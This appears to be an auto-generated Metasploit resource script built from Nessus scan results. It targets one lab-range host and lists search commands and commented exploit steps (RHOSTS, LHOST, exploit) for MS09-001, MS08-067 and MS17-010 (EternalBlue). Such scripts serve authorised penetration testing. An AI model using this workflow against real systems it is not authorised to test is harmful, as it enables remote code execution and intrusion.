# Metasploit Resource Script for Exploit Framework Vulnerabilities
# Generated from Nessus raw scan data
# Total vulnerabilities with Metasploit exploits: 3
# Target hosts: 10.129.252.161
# Associated CVEs: 

# Set global options
setg VERBOSE true

# CRITICAL - MS09-001: Microsoft Windows SMB Vulnerabilities Remote Code Execution (958687) (uncredentialed check)
# Host: 10.129.252.161 | Plugin ID: 35362
# CVSS Score: 10.0

# Specific Metasploit Exploit: Microsoft SRV.SYS WriteAndX Invalid DataOffset
search Microsoft SRV.SYS WriteAndX

search MS09-001: Microsoft Windows
# Review search results and select appropriate module
# search type:exploit
# use <module_path>
# set RHOSTS 10.129.252.161
# set LHOST <your_ip>
# exploit

# CRITICAL - MS08-067: Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution (958644) (ECLIPSEDWING) (uncredentialed check)
# Host: 10.129.252.161 | Plugin ID: 34477
# CVSS Score: 10.0

# Specific Metasploit Exploit: MS08-067 Microsoft Server Service Relative Path Stack Corruption
search MS08-067 Microsoft Server

search MS08-067: Microsoft Windows
# Review search results and select appropriate module
# search type:exploit
# use <module_path>
# set RHOSTS 10.129.252.161
# set LHOST <your_ip>
# exploit

# HIGH - MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)
# Host: 10.129.252.161 | Plugin ID: 97833
# CVSS Score: 9.3

# Specific Metasploit Exploit: SMB DOUBLEPULSAR Remote Code Execution
search SMB DOUBLEPULSAR Remote

search MS17-010: Security Update
# Review search results and select appropriate module
# search type:exploit
# use <module_path>
# set RHOSTS 10.129.252.161
# set LHOST <your_ip>
# exploit
